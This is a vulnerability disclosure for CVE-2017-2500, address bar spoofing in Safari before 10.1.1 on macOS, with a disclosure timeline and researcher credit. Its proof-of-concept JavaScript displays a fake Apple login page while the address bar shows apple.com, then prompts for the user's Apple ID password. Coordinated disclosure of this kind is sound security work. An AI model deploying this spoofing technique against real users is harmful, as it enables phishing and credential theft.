September 14, 2018

[CVE-2017-2500]Address bar spoofing on macOS Safari

Affected Products

Safari <10.1.1 on macOS

Description

When we visit an URL with a special port or an address which exists in DNS record but cannot access anymore(such as "http://www.apple.com:1234" or "http://access.apple.com"),safari will try to connect this port,so during the loading time,spoofing will be occured!

The PoC

<script>
function spoof(){

document.write("<title>Apple login</title><h1>Trust me!This is apple.com!</h1>");

window.location.assign("http://www.apple.com:1234");
//or you can use the following script:
//window.location.assign("http://access.apple.com");

}
setInterval(spoof(),2000);
setTimeout(function(){
    prompt('Checking your appid password:');
},6000);
</script>

Disclosure Timeline

2017/2/7 Provide vulnerability detail to APPLE via product-security@apple.com

2017/4/26 Apple fix it in Safari 10.1.1

2017/5/12 CVE-2017-2500 assigned.

Credit

This vulnerability was discovered by Zhiyang Zeng and Yuyang Zhou of Tencent Security Platform Department.